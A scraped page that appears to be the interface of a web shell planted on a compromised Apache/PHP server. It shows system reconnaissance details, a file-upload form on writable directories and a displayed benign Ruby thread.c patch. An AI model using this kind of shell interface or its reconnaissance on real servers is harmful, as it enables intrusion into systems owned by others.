Heray-Was-Here
Server : Apache
System : Linux vps103298.mylogin.co 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : calvet ( 273824)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /proc/self/root/proc/self/root/usr/local/rvm/patches/ruby/2.3.4/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/proc/self/root/usr/local/rvm/patches/ruby/2.3.4/fix_rb_thread_fd_close.patch
--- ruby_2_3/thread.c  2017/04/09 11:53:53 58288
+++ ruby_2_3/thread.c  2017/04/09 13:26:01 58289
@@ -2187,6 +2187,12 @@
     return busy;
 }

+void
+rb_thread_fd_close(int fd)
+{
+    while (rb_notify_fd_close(fd));
+}
+
 /*
  *  call-seq:
  *     thr.raise

Hry